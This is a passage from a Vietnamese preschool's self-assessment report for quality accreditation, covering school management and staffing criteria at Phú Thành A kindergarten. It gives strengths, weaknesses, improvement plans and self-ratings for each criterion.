Thực hiện các văn bản hướng dẫn thực hiện nhiệm vụ năm học đối với ngành học mầm non và kế hoạch phát động thi đua của cấp trên, nhà trường đã xây dựng kế hoạch và tổ chức tốt các phong trào thi đua cả năm, phong trào thi đua ngắn hạn như “ Dạy tốt học tốt”,  phong trào “Xây dựng trường học thân thiện, học sinh tích cực”, xây dựng trường “Xanh- Sạch- đẹp”  theo năm học, theo học kỳ, theo tháng. Sau mỗi đợt thi đua đều có đánh giá những mặt đã đạt được và những tồn tại và khen thưởng cho các cá nhân và tập thể đạt thành tích cao [H1.1.05.02].

  1. Điểm mạnh

Nhà trường có đầy đủ các hồ sơ theo quy định tại Điều lệ trường mầm non. Hồ sơ, văn bản của nhà trường lưu trữ theo quy định của Luật lưu trữ. Nhà trường xây dựng kế hoạch và tổ chức duy trì tốt các phong trào thi đua theo hướng dẫn của cấp trên.

  1. Điểm yếu

Còn 01 hồ sơ quản lý nhân sự phiếu đánh giá chuẩn nghề nghiệp giáo viên mầm non năm học 2015-2016 chưa cập nhật kịp thời do còn sơ sót.

Sổ nghị quyết tháng 11 còn thiếu vài chữ ký của giáo viên do sau khi phiên họp kết thúc giáo viên về vội.

  1. Kế hoạch cải tiến chất lượng

Hiệu trưởng chỉ đạo văn thư cập nhật kịp thời phiếu đánh giá chuẩn nghề nghiệp giáo viên mầm non năm học 2015-2016 vào hồ sơ quản lý nhân sự của từng giáo viên kịp thời. Khắc phục cuối tháng 11/2016.

Hiệu trưởng chỉ đạo thư ký hội đồng nhắc nhỡ giáo viên, nhân viên sau khi họp dành thời gian ký tên vào sổ nghị quyết đầy đủ trước khi khép hồ sơ qua tháng mới, khắc phục đến cuối tháng 11/2016.

  1. Tự đánh giá : Đạt

 Tiêu chí 6. Quản lý các hoạt động giáo dục, quản lý cán bộ, giáo viên, nhân viên, trẻ và quản lý tài chính, đất đai, cơ sở vật chất theo quy định.

  1. a) Thực hiện nhiệm vụ quản lý các hoạt động giáo dục và quản lý trẻ theo quy định của Điều lệ trường mầm non;
  2. b) Thực hiện tuyển dụng, đề bạt, bổ nhiệm, quản lý cán bộ, giáo viên và nhân viên theo quy định của Luật Cán bộ, công chức, Luật Viên chức, Điều lệ trường mầm non và các quy định khác của pháp luật;
  3. c) Quản lý, sử dụng hiệu quả tài chính, đất đai, cơ sở vật chất để phục vụ các hoạt động giáo dục.
  4. Mô tả hiện trạng

Nhà trường quản lý các hoạt động giáo dục gồm: Hoạt động chơi, hoạt động học, hoạt động lao động, hoạt động ngày hội, ngày lễ, hoạt động kiểm tra đánh giá giáo viên, nhân viên và quản lý trẻ đúng theo quy định của Điều lệ trường mầm non. Tuy nhiên do công việc của ban giám hiệu nhiều nên còn 01 tháng  kiểm tra chưa đúng thời gian theo kế hoạch. [H1.1.06.01].

Trường thực hiện tốt công tác tham mưu với lãnh đạo Phòng giáo dục về tuyển dụng, đề bạt, cán bộ quản lý, giáo viên và nhân viên, xây dựng kế hoạch huy hoạch cán bộ nguồn giai đoạn 2011-2016 và giai đoạn 2016-2021 đưa ra tổ chuyên môn lấy ý kiến lấy phiếu tín nhiệm và triển khai trong hội đồng sư phạm thống nhất để bổ sung cho Đảng ủy phê duyệt nộp lên Phòng Giáo dục ĐT, thực hiện bổ nhiệm tổ trưởng, tổ phó đúng chỉ đạo của lãnh đạo PGD-ĐT, thực hiện nghiêm túc việc quản lý cán bộ, giáo viên và nhân viên theo quy định của Luật Cán bộ, công chức, Luật Viên chức như cập nhật thông tin các số liệu quản lý nhân sự thường xuyên trên phần mềm PMIS, quản lý hồ sơ nhân sự, hồ sơ sổ sách, giờ giấc làm việc của CB-GV-NV.[H1.1.06.02].   

Nhà trường quản lý chặt chẽ nguồn tài chính, có công khai minh bạch rõ ràng trên bản tin và trong cuộc họp hội đồng. Việc sử dụng ngân sách đảm bảo đúng quy định, chi tiết kiệm tối đa nguồn tài chính của đơn vị. Nhà trường quản lý tốt diện tích đất hiện có và sử dụng đúng mục đích không cho thuê, mướn trái quy định. Thực hiện quản lý, theo dõi các công cụ, dụng cụ và trang thiết bị lớp học, hàng năm thực hiện kiểm kê tài sản vào tháng 12 và báo cáo về cấp trên theo đúng qui định, sử dụng tối đa cơ sở vật chất hiện có để phục vụ các hoạt động chăm sóc giáo dục trẻ. .Đất thuộc điểm phụ ấp Long An A chưa được sử dụng đúng mục đích do nhiều năm tranh chấp với người dân. [H1.1.06.03].

  1. Điểm mạnh

Nhà trường thực hiện quản lý các hoạt động giáo dục và quản lý trẻ theo quy định của Điều lệ trường mầm non. Thực hiện nghiêm túc việc quy hoạch cán bộ quản lý, bổ nhiệm tổ trưởng, tổ phó. Quản lý cán bộ, giáo viên và nhân viên theo quy định của Luật Cán bộ, công chức, Luật Viên chức. Quản lý và sử dụng có hiệu quả tài chính, đất đai, cơ sở vật chất.

  1. Điểm yếu

Tuy nhiên do công việc của ban giám hiệu nhiều nên còn 01 tháng  kiểm tra chưa đúng thời gian theo kế hoạch.

Đất thuộc điểm phụ ấp Long An A chưa được sử dụng đúng mục đích do nhiều năm tranh chấp với người dân.

  1. Kế hoạch cải tiến chất lượng

Hiệu trưởng, phó hiệu trưởng sắp xếp công việc khoa học để có thời gian kiểm tra chuyên đề, hoạt động sư phạm nhà giáo đúng thời gian theo kế  hoạch. Thực hiện đến giữa tháng 12/2016.

Hiệu trưởng liên hệ với Tòa Án huyện Tam Nông sớm xác đinh ranh giới đất đồng thời tham mưu với lãnh đạo Phòng Giáo dục Đào tạo xây cất phòng học tại điểm phụ Long An A để phục vụ cho các cháu năm học 2017-2018.

  1. Tự đánh giá: Đạt

Tiêu chí 7: Bảo đảm an ninh trật tự, an toàn tuyệt đối cho trẻ và cho cán bộ quản lý, giáo viên, nhân viên.

  1. a) Có phương án cụ thể bảo đảm an ninh trật tự trong nhà trường;
  2. b) Có phương án cụ thể phòng chống tai nạn thương tích; phòng chống cháy nổ; phòng chống dịch bệnh, ngộ độc thực phẩm trong nhà trường;
  3. c) Bảo đảm an toàn tuyệt đối cho trẻ và cho cán bộ, giáo viên, nhân viên trong phạm vi nhà trường.
  4. Mô tả hiện trạng

Hiệu trưởng có xây dựng phương án cụ thể bảo đảm an ninh trật tự trong nhà trường, cuối năm được UBND xã công nhận trường đảm bảo an ninh trật tự theo Quyết định số: 122/QĐ-UBND ngày 06 tháng 10 năm 2016 về việc công nhận trường Mầm non Phú Thành A đạt tiêu chuẩn “ An toàn về an ninnh trật tự” năm 2016 .  [H1.1.07.01].

Nhà trường có xây dựng các phương án cụ thể về phòng chống tai nạn thương tích, phòng chống cháy nổ, phòng chống dịch bệnh, ngộ độc thực phẩm trong nhà trường và phổ biến đến toàn thể cán bộ- giáo viên- nhân viên tại  phiên họp hội đồng nhà trường để biết cách xử lí khi xảy ra sự cố, tránh mọi sự đáng tiếc xảy ra. Tuy nhiên một số giáo viên nghiệp vụ sơ cấp cứu và xử trí ban đầu cho trẻ còn lúng túng, thao tác chưa thành thạo..[H1.1.07.02].

Tất cả cán bộ, giáo viên, nhân viên và học sinh của nhà trường được đảm bảo an toàn tuyệt đối về tính mạng như: phòng chống tai nạn thương tích các dịch bệnh trong nhà trường [H1.1.07.03].

  1. Điểm mạnh

Nhà trường có xây dựng các phương án: Đảm bảo an ninh trật tự, phòng chống tai nạn thương tích, phòng chống cháy nổ, phòng chống dịch bệnh, ngộ độc thực phẩm và phổ biến đến toàn thể cán bộ- giáo viên- nhân viên. Đảm bảo an toàn tuyệt đối cho trẻ và cán bộ giáo viên, nhân viên trong toàn trường.

  1. Điểm yếu

Một số giáo viên nghiệp vụ sơ cấp cứu và xử lý ban đầu cho trẻ còn lúng túng, thao tác chưa thành thạo.

  1. Kế hoạch cải tiến chất lượng

Hiệu trưởng phối hợp với trạm y tế có kế hoạch tập huấn thêm kiến thức cho giáo viên, nhân viên về công tác xử trí ban đầu khi có xảy ra sự cố để nắm lại cách sơ cứu ban đầu được nhanh gọn và khoa học trong học kỳ 2 năm học 2016-2017.

  1. Tự đánh giá : Đạt

Tiêu chí 8:  Tổ chức các hoạt động lễ hội, văn nghệ, vui chơi phù hợp với điều kiện địa phương.

  1. a) Có nội dung hoạt động lễ hội, văn nghệ, vui chơi theo từng tháng, từng năm học và thực hiện đúng tiến độ, đạt hiệu quả;
  2. b) Trong năm học tổ chức ít nhất 1 lần cho trẻ từ 4 tuổi trở lên tham quan địa danh, di tích lịch sử, văn hoá địa phương hoặc mời nghệ nhân hướng dẫn trẻ làm đồ chơi dân gian;
  3. c) Phổ biến, hướng dẫn cho trẻ các trò chơi dân gian, các bài ca dao, đồng dao, bài hát dân ca phù hợp.
  4. Mô tả hiện trạng

Nhà trường có xây dựng kế hoạch tổ chức các lễ hội như: Tổ chức ngày Hội đến trường của bé, tổ chức đêm hội trăng rằm, ngày hội giao lưu của Bé chào mừng ngày 20/11, văn nghệ “ Bé hát với mùa xuân”, tổ chức ngày Hội ra trường của bé… Bên cạnh đó, nhà trường cũng chỉ đạo cho giáo viên xây dựng kế hoạch tổ chức hoạt động vui chơi, trò chơi dân gian, văn nghệ cuối chủ đề vào trong kế hoạch chăm sóc giáo dục trẻ hàng tháng, theo chủ đề. Thực hiện ngày Hội đến trường của bé, tổ chức đêm hội trăng rằm, ngày hội giao lưu của Bé đúng tiến độ, đạt hiệu quả.[H1.1.08.01].

Trong năm học 2015-2016, nhà trường tổ chức cho trẻ đi tham quan 2 địa điểm; “Trường tiểu học” vào ngày 20/4/2016 có 184/184 trẻ tham gia đạt tỉ lệ 100% và tham quan “ Lễ hội kỳ yên” tại đình Thần của xã  từ ngày 25-26/52016 với 334/400 trẻ  tham gia đạt tỉ lệ 83,5%.[H1.1.08.02].

Nhà trường thường xuyên tổ chức cho trẻ chơi các trò chơi dân gian như: kéo co, rồng rắn lên mây, lộn cầu vồng… sau giờ thể dục buổi sáng và chỉ đạo giáo viên lập kế hoạch hàng tháng tổ chức lồng ghép các bài hát dân ca, đồng dao phù hợp với trẻ trong hoạt động dạy và học. Tuy nhiên, giáo viên tổ chức các trò chơi dân gian chưa thường xuyên do sưu tầm trò chơi mới còn chậm. [H1.1.08.03].

  1. Điểm mạnh

  Nhà trường tổ chức đầy đủ các hoạt động lễ hội, văn nghệ, tham quan, vui chơi phù hợp với điều kiện địa phương. Tổ chức cho trẻ tham quan trường Tiểu học có 184 trẻ tham gia và xem hội kỳ yên của địa phương với 334 trẻ tham gia, giáo viên phổ biến, hướng dẫn cho trẻ các trò chơi dân gian, các bài ca dao, đồng dao, bài hát dân ca phù hợp, trẻ mạnh dạn giao tiếp, thân thiện với những người xung quanh qua các hoạt động học tập, vui chơi.

  1. Điểm yếu

Một số giáo viên tổ chức các trò chơi dân gian chưa thường xuyên do sưu tầm trò chơi mới còn chậm.

  1. Kế hoạch cải tiến chất lượng

Ban giám hiệu chỉ đạo chi đoàn trường tích cực sưu tầm các trò chơi dân gian mới để hấp dẫn, lôi cuốn trẻ tham gia trò chơi dân gian, chỉ đạo giáo viên phải tổ chức cho trẻ chơi thường xuyên để trẻ thuộc thuần thục trò chơi dân gian.

  1. Tự đánh giá : Đạt

          Kết luận tiêu chuẩn 1: Tổ chức và quản lý nhà trường      

  1. Điểm mạnh cơ bản

Nhà trường có đủ cơ cấu tổ chức bộ máy theo quy định của Điều lệ trường mầm non. Có hiệu trưởng và 02 phó hiệu trưởng, các tổ chuyên môn thực hiện đúng chức năng nhiệm vụ theo quy định. Bộ máy hoạt động đều tay, phối hợp nhịp nhàng, đồng bộ thực hiện mục tiêu nâng cao chất lượng chăm sóc giáo dục trẻ tại trường. Tổ chức lớp học và có số lượng trẻ trong một lớp theo quy định. Thực hiện tốt các chỉ thị, nghị quyết của Đảng, chấp hành tốt sự quản lý của chính quyền địa phương và của cơ quan quản lý giáo dục, thực hiện tốt chế độ báo cáo định kỳ và quy chế dân chủ trong đơn vị. Thực hiện tốt các chỉ thị, nghị quyết của Đảng, chấp hành tốt sự quản lý của chính quyền địa phương và của cơ quan quản lý giáo dục, thực hiện tốt chế độ báo cáo định kỳ và quy chế dân chủ trong đơn vị. Công tác quản lý chuyên môn, quản lý tài chính, tài sản theo đúng các văn bản quy định, công tác chăm sóc sức khoẻ, đảm bảo an ninh trật tự, an toàn tuyệt đối cho trẻ và CB-GV-NV được chú trọng, nhà trường tổ chức các hoạt động lễ hội văn nghệ vui chơi phù hợp với điều kiện của trẻ và cơ sở vật chất của nhà trường giúp cho trẻ cảm thụ các giá trị văn hoá mang đậm bản sắc dân tộc địa phương.

  1. Điểm yếu cơ bản

Còn 01 lớp 4-5 tuổi ở điểm chính 47 trẻ vượt 17 trẻ so với qui định do phụ huynh có nhu cầu gởi bán trú, 01 lớp ghép 3 độ tuổi 3,4,5 chưa được tách lớp do thiếu giáo viên.

+ Số tiêu chí đạt: 8/8 tiêu chí

+ Số tiêu chí không đạt: 0/8 tiêu chí.

        Tiêu chuẩn 2: Cán bộ quản lý, giáo viên, nhân viên và trẻ

Mở đầu: Trường Mầm non Phú Thành A là trường hạng I, có số lượng cán bộ quản lý, giáo viên và nhân viên đảm bảo cho hoạt động chăm sóc giáo dục trẻ. Đội ngũ cán bộ giáo viên có sức khoẻ, có năng lực chuyên môn, nhiệt tình, trách nhiệm. 100% số giáo viên đạt chuẩn và trên chuẩn có ý thức tự giác học hỏi, có ý chí vươn lên trong công tác. Tập thể Hội đồng sư phạm là một khối đoàn kết, thống nhất cao trong mọi hoạt động.

Tiêu chí 1: Năng lực của hiệu trưởng, phó hiệu trưởng trong quá trình triển khai các hoạt động nuôi dưỡng, chăm sóc và giáo dục trẻ.

  1. a) Có thời gian công tác theo quy định tại Điều lệ trường mầm non; có bằng trung cấp sư phạm mầm non trở lên; đã được bồi dưỡng nghiệp vụ quản lý giáo dục và lý luận chính trị theo quy định;
  2. b) Được đánh giá hằng năm đạt từ loại khá trở lên theo Quy định Chuẩn hiệu trưởng trường mầm non;
  3. c) Có năng lực quản lý và tổ chức các hoạt động của nhà trường, nắm vững Chương trình Giáo dục mầm non; có khả năng ứng dụng công nghệ thông tin vào công tác quản lý và chỉ đạo chuyên môn.
  4. Mô tả hiện trạng

 Hiệu trưởng có thời gian công tác liên tục trong ngành giáo dục 31 năm có bằng đại học mầm non đã qua lớp bồi dưỡng về nghiệp vụ quản lí giáo dục đạt trình độ sơ cấp lý luận chính trị. Phó hiệu trưởng phụ trách công tác giáo dục có thời gian công tác liên tục trong ngành giáo dục 14 năm có bằng đại học mầm non đã qua lớp bồi dưỡng về nghiệp vụ quản lí giáo dục và lớp sơ cấp lý luận chính trị. Phó hiệu trưởng 02 phụ trách công tác chăm sóc, nuôi dưỡng có thời gian công tác liên tục trong giáo dục mầm non 9 năm có bằng đại học sư phạm mầm non và đã học qua lớp bồi dưỡng về nghiệp vụ quản lí giáo dục và đạt trình độ sơ cấp lý luận chính trị. Tuy nhiên, hiệu trưởng và 01 phó hiệu trưởng phụ trách cơ sở vật chất chưa đạt trình độ trung cấp lý luận chính trị do chưa được tạo điều kiện tham gia học tập. [H2.2.01.01]

          Hiệu trưởng và Phó hiệu trưởng có tinh thần trách nhiệm cao, luôn gương mẫu đi đầu trong các phong trào, được sự tín nhiệm cao của tập thể, các cơ quan ban ngành đoàn thể, chính quyền địa phương và Phòng Giáo dục và Đào tạo đánh giá về chuẩn hiệu trưởng và phó hiệu trưởng trong các năm qua đều được xếp loại tốt  trở lên [H2.2.01.02].

Hiệu trưởng và các phó hiệu trưởng đều có năng lực quản lí và tổ chức các hoạt động chăm sóc giáo dục của nhà trường, nắm vững chương trình Giáo dục mầm non và có khả năng soạn thảo văn bản, ứng dụng công nghệ thông tin vào công tác quản lí, chỉ đạo chuyên môn, sử dụng được một số phần mềm: Emis, Pmis, phần mềm phổ cập GDMNTNT, phần mềm giáo án điện tử. [H2.2.01.03].

  1. Điểm mạnh

Ban giám hiệu nhà trường có nhiều năm công tác trong ngành nên nắm vững chuyên môn, có tinh thần trách nhiệm cao luôn quan tâm giúp đỡ giáo viên – nhân viên trong nhà trường, được cán bộ, giáo viên, nhân viên và quản lý cấp trên đánh giá cao, tất cả đều có bằng đại học sư phạm mầm non, đã qua lớp bồi dưỡng về nghiệp vụ quản lí giáo dục, đạt trình độ sơ cấp lý luận chính trị. Hiệu trưởng và các phó hiệu trưởng hàng năm đều được đánh giá theo quy định chuẩn hiệu trưởng trường mầm non được xếp loại từ loại khá trở lên.

  1. Điểm yếu

Còn hiệu trưởng và 01 phó hiệu trưởng chưa đạt trình độ trung cấp lý luận chính trị vì chưa được tạo điều kiện tham gia học.

  1. Kế hoạch cải tiến chất lượng

Hiệu trưởng tham mưu tích cực với Đảng ủy và lãnh đạo Phòng Giáo dục và Đào tạo, tạo điều kiện cho hiệu trưởng và 01 phó hiệu trưởng được tham gia học lớp trung cấp chính trị để nâng cao trình độ lý luận chính trị. Thực hiện trong năm học 2016-2017 và những năm tiếp theo.

  1. Tự đánh giá: Đạt.

 Tiêu chí 2: Số lượng, trình độ đào tạo và yêu cầu về kiến thức của giáo viên.

  1. a) Số lượng giáo viên theo quy định;
  2. b) 100% giáo viên đạt trình độ chuẩn được đào tạo trở lên, trong đó có ít nhất 30% giáo viên trên chuẩn về trình độ đào tạo đối với miền núi, vùng sâu, vùng xa, hải đảo và ít nhất 40% đối với các vùng khác;
  3. c) Có hiểu biết về văn hóa và ngôn ngữ dân tộc phù hợp với địa bàn công tác và có kiến thức cơ bản về giáo dục hoà nhập trẻ khuyết tật.
  4. Mô tả hiện trạng

Năm học 2016-2017 trường có 18 giáo viên dạy ở  11 lớp và 01 NTCĐ đủ giáo viên dạy lớp. Cụ thể: Có 02 giáo viên dạy Nhà trẻ và 01 giáo viên dạy NTCĐ, 02 GV dạy lớp 3-4 tuổi, 4 GV dạy 3 lớp 4-5 tuổi và  9 GV dạy 6 lớp 5-6 tuổi.  [H2.2.02.01].

Nhà trường có 17/18 giáo viên trình độ đạt chuẩn tỷ lệ 94,44% trong đó trên chuẩn là 15/18 giáo viên, đạt tỷ lệ 83,33% [H2.2.02.02]. Ngoài ra, trong năm còn hợp đồng 03 GV dạy thay cho 03 giáo viên nghỉ thai sản và 01 giáo viên hợp đồng dạy nhóm trẻ cộng đồng chưa đạt chuẩn trình độ đào tạo.

Giáo viên là dân địa phương công tác tại trường nên có hiểu biết về văn hóa và ngôn ngữ dân tộc phù hợp với địa bàn công tác. Giáo viên được học, bồi dưỡng và có kiến thức cơ bản về giáo dục hoà nhập trẻ khuyết tật [H2.2.02.03].

  1. Điểm mạnh

Nhà trường có 18 giáo viên đủ phân bổ dạy các lớp. Tỷ lệ giáo viên đạt chuẩn 100% trong đó trên chuẩn 83,33%,  giáo viên đều có hiểu biết về văn hóa,  ngôn ngữ phù hợp với địa phương; có kiến thức cơ bản về giáo dục hòa nhập trẻ khuyết tật.

  1. Điểm yếu

Còn 04 GV hợp đồng trong năm học do giáo viên nghỉ thai sản và dạy NTCĐ.

  1. Kế hoạch cải tiến chất lượng

Đến thời điểm tháng 02/ 2017, sau khi hết thời gian nghỉ hộ sản các giáo viên trong biên chế của trường sẽ chấm dứt hợp đồng với các giáo viên đang hợp đồng.

5.Tự đánh giá:  Đạt. 

Tiêu chí 3: Kết quả đánh giá, xếp loại giáo viên và việc bảo đảm các quyền của giáo viên

  1. a) Xếp loại chung cuối năm học của giáo viên đạt 100% từ loại trung bình trở lên, trong đó có ít nhất 50% xếp loại khá trở lên theo Quy định về Chuẩn nghề nghiệp giáo viên mầm non;
  2. b) Số lượng giáo viên đạt danh hiệu giáo viên dạy giỏi cấp huyện (quận, thị xã, thành phố trực thuộc tỉnh) trở lên đạt ít nhất 5%;
  3. c) Giáo viên được bảo đảm các quyền theo quy định của Điều lệ trường mầm non và của pháp luật.
  4. Mô tả hiện trạng

Năm học 2015- 2016 nhà trường có 16/17 giáo viên xếp loại chung từ loại khá trở lên chiếm tỉ lệ 94,11% trong đó có 13 giáo viên xếp loại xuất sắc chiếm tỉ lệ 76,47% theo Quy định về Chuẩn nghề nghiệp giáo viên mầm non [H2.2.03.01]. Còn 01 giáo viên xếp loại không hoàn thành nhiệm vụ theo đánh giá công chức cuối năm và  xếp loại Kém theo đánh giá chuẩn nghề nghiệp giáo viên mầm non, chiếm tỉ lệ 5,88% do không tham gia học chính trị hè.

Hàng năm trường đều có giáo viên đạt giáo viên dạy giỏi vòng huyện trở lên. Từ năm học 2009-2010 đến năm học 2015-2016 trường có 6/17 giáo viên đạt giáo viên dạy giỏi cấp huyện đạt tỉ lệ 35,29% [H2.2.03.02].

Tất cả giáo viên nhà trường được đảm bảo các quyền theo quy định tại Điều 37 Điều lệ trường mầm non ban hành tại văn bản hợp nhất số 04/VBHN-BGDĐT ngày 24/12/2005 của Bộ GDĐT: Được đảm bảo các điều kiện để thực hiện nhiệm vụ chăm sóc giáo dục trẻ, được đào tạo nâng cao trình độ, bồi dưỡng chuyên môn, nghiệp vụ, được hưởng lương, phụ cấp và các chế độ khác, được hưởng mọi quyền lợi về vật chất và tinh thần, được bảo vệ nhân phẩm, danh dự và được thực hiện các quyền khác theo quy định của pháp luật [H2.2.03.03].

  1. Điểm mạnh

Trường có 16/17 giáo viên được đánh giá Chuẩn nghề nghiệp Giáo viên mầm non đạt loại Khá trở lên. Tỷ lệ giáo viên đạt danh hiệu giáo viên dạy giỏi là 5/17 đạt tỉ lệ 17,64%. Có 17/17 giáo viên đạt tỉ lệ 100% được đảm bảo các quyền theo quy định của Điều lệ trường mầm non và của pháp luật.

  1. Điểm yếu

Còn 01 giáo viên xếp loại không hoàn thành nhiệm vụ theo đánh giá công chức cuối năm và xếp loại kém theo Quy định về đánh giá Chuẩn nghề nghiệp giáo viên mầm non do không tham gia học chính trị hè.

  1. Kế hoạch cải tiến chất lượng.

Tại các phiên họp, BGH thường xuyên nhắc nhỡ cán bộ, giáo viên, nhân viên trong nhà trường chấp hành nghiêm các nội quy, quy chế của ngành, của trường.

  1. Tự đánh giá: Không Đạt.

Tiêu chí 4. Số lượng, chất lượng và việc bảo đảm chế độ, chính sách đối với đội ngũ nhân viên của nhà trường.

  1. a) Số lượng nhân viên theo quy định;
  2. b) Đạt trình độ chuẩn được đào tạo theo quy định tại Điều lệ trường mầm non, riêng nhân viên nấu ăn phải có chứng chỉ nghề nấu ăn;
  3. c) Nhân viên thực hiện đầy đủ nhiệm vụ được giao và được bảo đảm chế độ, chính sách theo quy định.
  4. Mô tả hiện trạng

Năm học 2016-2017 trường có 7 nhân viên gồm: 01 nhân viên kế toán, 01 nhân viên y tế học đường kiêm thủ quỹ, 01 nhân viên văn thư, 01 nhân viên bảo vệ và 03 nhân viên cấp dưỡng nấu ăn cho 223/398 trẻ ở bán trú tại trường và nhóm trẻ cộng đồng. Nhà trường có đủ số lượng nhân viên theo qui định [H2.2.04.01].

Nhân viên kế toán trường có trình độ Cao đẳng kế toán, văn thư đạt trình độ trung cấp, nhân viên y tế học đường có trình độ trung cấp điều dưỡng, một nhân viên cấp dưỡng có giấy chứng chỉ nghề nấu ăn [H2.2.04.02]. Còn 02 nhân viên cấp dưỡng chưa có giấy chứng chỉ nghề nấu ăn và 01 nhân viên bảo vệ chưa tham gia bồi dưỡng nghiệp vụ do mới hợp đồng, nhân viên y tế học đường chưa đạt trình độ trung cấp y sĩ theo Thông tư số 13/2016/TTLT-BYT-BGDĐT ngày 12 tháng 5 năm 2016 Quy định về công tác Y tế trường học do Thông tư mới ban hành.

Đội ngũ nhân viên của nhà trường thực hiện các nhiệm vụ theo quy định tại điều 36 của Điều lệ trường mầm non: Kế toán thực hiện quản lý tài sản, tài chính, thu chi và báo cáo tài chính; văn thư tiếp nhận và lưu trữ công văn; y tế học đường theo dõi và chăm sóc sức khoẻ cho cán bộ, giáo viên, nhân viên và trẻ; thực hiện các nhiệm vụ khác theo phân công của hiệu trưởng. Nhân viên được học bồi dưỡng nghiệp vụ theo quy định, được bảo vệ nhân phẩm, danh dự; hàng năm nhân viên được đánh giá xếp loại theo quy định [H2.2.04.03]; được hưởng lương, bảo hiểm xã hội, bảo hiểm y tế…và được hưởng các quyền lợi về vật chất và tinh thần [H2.2.03.03].

  1. Điểm mạnh

Trường có 7 nhân viên gồm: 01 nhân viên kế toán, 01 nhân viên y tế học đường kiêm thủ quỹ, 01 nhân viên văn thư, 01 nhân viên bảo vệ và 04 nhân viên cấp dưỡng, các nhân viên kế toán, văn thư đều đạt trình độ chuẩn, trên chuẩn, 01 nhân viên cấp dưỡng có giấy chứng chỉ nghề nấu ăn. Các nhân viên thực hiện đầy nhiệm vụ được giao và được đảm bảo chế độ chính sách theo quy định.

  1. Điểm yếu

Còn 02 nhân viên cấp dưỡng chưa có giấy chứng chỉ nghề nấu ăn và 01 nhân viên bảo vệ chưa tham gia bồi dưỡng nghiệp vụ do mới hợp đồng. Nhân viên y tế học đường chưa đạt trình độ trung cấp y sĩ theo Thông tư số 13/2016/TTLT-BYT-BGDĐT ngày 12 tháng 5 năm 2016 Quy định về công tác Y tế trường học do Thông tư mới ban hành.

  1. Kế hoạch cải tiến chất lượng

Nhà trường đã tạo điều kiện cho nhân viên bảo vệ và nhân viên cấp dưỡng tham gia học bồi dưỡng khi cấp trên có mở lớp để đạt trình độ theo qui định đến cuối học kỳ II năm học 2016- 2017. Khuyến khích nhân viên y tế học đường tham gia lớp trung cấp y sĩ để  đạt trình độ trung cấp y sĩ theo qui định. Thời gian đến tháng 01/2018.

5.Tự đánh giá:  Không Đạt.

Tiêu chí 5. Trẻ được tổ chức nuôi dưỡng, chăm sóc, giáo dục và được bảo đảm quyền lợi theo quy định.

  1. a) Được phân chia theo độ tuổi;
  2. b) Được tổ chức bán trú và học 2 buổi/ngày;
  3. c) Được bảo đảm quyền lợi theo quy định.
  4. Mô tả hiện trạng

Trường có 11 nhóm, lớp và 01 nhóm trẻ cộng đồng, đa số lớp được phân chia theo độ tuổi: Gồm 02 nhóm nhà trẻ với 34 trẻ (Trong đó 01 nhóm trẻ công lập và 01 nhóm trẻ  NTCĐ), 01 lớp 3- 4 tuổi với 33 trẻ, 3 lớp 4- 5 tuổi với 104 trẻ, 6 lớp 5 – 6 tuổi với 227 trẻ [H2.2.05. 01]. Tuy nhiên, còn 01 lớp 5 tuổi điểm phụ Tân Dinh thực hiện lớp ghép 3 độ tuổi do thiếu giáo viên.

Nhà trường có 223 trẻ được tổ chức bán trú và 20 trẻ ăn trưa tại trường đạt tỷ lệ 61,05%, tất cả trẻ còn lại đều được học 2 buổi/ngày [H2.2.05.02].

Có 398/398 trẻ đều được chăm sóc nuôi dưỡng, giáo dục theo mục tiêu chương trình giáo dục mầm non, được khám sức khỏe ban đầu, được theo dõi biểu đồ tăng trưởng, được hưởng các chế độ chính sách theo quy định tại Nghị định 49/2010/NĐ-CP, ngày 14/5/2010; Thông tư 29/2011/TTTL-BGDĐT-BTC, ngày 15/11/2011[H2.2.05.03].

  1. Điểm mạnh

Nhà trường tổ chức nuôi dưỡng, chăm sóc giáo dục trẻ theo qui định, có 10 nhóm lớp được phân chia đúng theo độ tuổi, có 223 trẻ được tổ chức học bán trú đạt tỉ lệ 61,05%, số còn lại đều được học 2 buổi/ngày, tất cả trẻ đều được đảm bảo quyền lợi theo quy định.

  1. Điểm yếu

Còn 1 lớp 5 tuổi ghép 3 độ tuổi 3-4-5 tuổi do thiếu giáo viên.

  1. Kế hoạch cải tiến chất lượng

Nhà trường tích cực tham mưu với các cấp lãnh đạo để xây cất thêm phòng học để đáp ứng nhu cầu gửi bán trú ở điểm chính và phân chia theo độ tuổi các điểm phụ năm học 2017-2018.

  1. Tự đánh giá: Đạt

Kết luận tiêu chuẩn 2: Cán bộ quản lý, giáo viên, nhân viên và trẻ.

  1. Điểm mạnh cơ bản

Cán bộ quản lý, giáo viên, nhân viên nhà trường đa số đều đạt trình độ chuyên môn chuẩn và trên chuẩn. Hiệu trưởng có thời gian giảng dạy 31 năm, các phó hiệu trưởng có thời gian giảng dạy 9 đến 14 năm và đã được bồi dưỡng về nghiệp vụ quản lý giáo dục và lý luận chính trị. Giáo viên đủ số lượng dạy 2 buổi/ ngày hằng năm được bồi dưỡng thường xuyên về chuyên môn nghiệp vụ, có 03 giáo viên đạt danh hiệu giáo viên dạy giỏi cấp huyện. Có đủ số nhân viên theo quy định của Điều lệ trường mầm non. CB-GV-NV và trẻ được nhà trường đảm bảo thực hiện các quyền lợi theo quy định của pháp luật, cuối năm học có 16/17 giáo viên xếp loại chung từ loại khá trở lên chiếm tỉ lệ 94,11%  theo đánh giá cán bộ công chức và Quy định về Chuẩn nghề nghiệp giáo viên mầm non, trường luôn giữ được mối đoàn kết nội bộ, không có cán bộ, giáo viên bị kỷ luật.

  1. Điểm yếu cơ bản

Cuối năm học, trường còn 01 giáo viên không hoàn thành nhiệm vụ, xếp loại Kém theo Quy định về Chuẩn nghề nghiệp giáo viên mầm non chiếm tỉ lệ 5,88%, nhân viên y tế chưa đạt trình độ chuẩn theo qui định, 03 cấp dưỡngchưa có giấy chứng chỉ nghề nấu ăn và 01 nhân viên bảo vệ chưa tham gia bồi dưỡng nghiệp vụ do mới hợp đồng.

+ Số tiêu chí đạt: 4/5 tiêu chí

+ Số tiêu chí không đạt: 1/5 tiêu chí.

Tiêu chuẩn 3: Cơ sở vật chất, trang thiết bị, đồ dùng, đồ chơi

